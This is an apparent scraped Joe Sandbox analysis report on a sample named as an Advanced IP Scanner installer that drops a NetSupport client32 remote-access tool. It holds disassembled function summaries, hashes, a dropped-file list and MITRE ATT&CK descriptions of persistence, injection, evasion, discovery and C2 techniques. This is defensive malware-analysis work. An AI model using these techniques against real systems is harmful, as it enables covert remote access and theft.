Opcode Fuzzy Hash: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
Instruction Fuzzy Hash: 4FD02BB5A1032DABC314CA41DC81FD2F3AC9B103A4F004039F62442100D571E540C394

Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,?), ref: 1100102B

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11001016
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-2830328467
Opcode ID: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
Instruction ID: ee2bff440c1eeb311b517f53df1393b18d0186c38d15746519086ed5f67e1e1e
Opcode Fuzzy Hash: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
Instruction Fuzzy Hash: 50D02BB260032DABC310D641DC80FD2B3DCDB04364F008039FA5442140D670E4808390

Function 685ABB00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 685ABB2D

Strings

NSMString.cpp, xrefs: 685ABB17
IsA(), xrefs: 685ABB1C

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _free
String ID: IsA()$NSMString.cpp
API String ID: 269201875-2362537096
Opcode ID: 49e0b4f523b3a4704b9e28553d5f016e01815797911dbdd6264ee6f7239414b0
Instruction ID: b1e45d112a98bfcec7400ba94fbe768ae9de5fdb54f029e670f3cd2ee855097d
Opcode Fuzzy Hash: 49e0b4f523b3a4704b9e28553d5f016e01815797911dbdd6264ee6f7239414b0
Instruction Fuzzy Hash: 02D0A9BA8882089FCE14AA5C7C41C7E33D88F89218FC40869BD8CA7204E7206C4402EB

Function 1110F3E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1110F3EA
SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 1110F400

Strings

MSOfficeWClass, xrefs: 1110F3E5

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FindMessageSendWindow
String ID: MSOfficeWClass
API String ID: 1741975844-970895155
Opcode ID: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
Instruction ID: 17eb5a188d88a84c71184668e46e9585b6c12665a03152ba016c754b78296158
Opcode Fuzzy Hash: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
Instruction Fuzzy Hash: 2BD0127035035977E6001AA2DD4EF99BB5CDB44B55F118024F706AA0C1DBB0B440876A

Function 685ADAC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 685ADAE4

Strings

this->hReadyEvent, xrefs: 685ADAD3
Refcount.cpp, xrefs: 685ADACE

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Event
String ID: Refcount.cpp$this->hReadyEvent
API String ID: 4201588131-2118820724
Opcode ID: e53f6f3fee6932fe1fa197ab8c4102f02c68ca67131d2c4e3762bfcbae0d5d3d
Instruction ID: 407b9da54c555abc21c2349756d59ab428aa75f4e56efd4e4391899fb9ba5e2d
Opcode Fuzzy Hash: e53f6f3fee6932fe1fa197ab8c4102f02c68ca67131d2c4e3762bfcbae0d5d3d
Instruction Fuzzy Hash: 62D01331544211FFC6105658A845BDD32A45B45355F415575F90551144D660684947D8

Function 1101D040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 1101D064

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 1101D053
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D04E

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMenuMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1590435379-2830328467
Opcode ID: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
Instruction ID: a479ae3ba71ad1bbfd929d5f192baf473b643c420dccf9ee561c4944f6f7f77e
Opcode Fuzzy Hash: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
Instruction Fuzzy Hash: 51D022B5E0023AABC320E611ECC8FC6B2A85B00318F044468F12062000E678E480C380

Function 11157350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 11157358
GetPropA.USER32(?,OldMenu), ref: 11157368

Strings

OldMenu, xrefs: 11157362

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MenuProp
String ID: OldMenu
API String ID: 601939786-3235417843
Opcode ID: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
Instruction ID: 521654fc19124d4f771c6bc11addf53dd8358c346f2b3ea316e48a946e839c39
Opcode Fuzzy Hash: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
Instruction Fuzzy Hash: 96C0123260653D7782421A959D85ACEF76CAD162653008062FA10A2100F724551187EA

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Advanced_IP_Scanner_2.5.4594.12.exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Remote Access Functionality

Suricata Signatures

Joe Sandbox Signatures

Cryptography

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Advanced IP Scanner\Advanced_IP_Scanner.ico (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ar_sa.qm (copy)

Windows Analysis Report
Advanced_IP_Scanner_2.5.4594.12.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
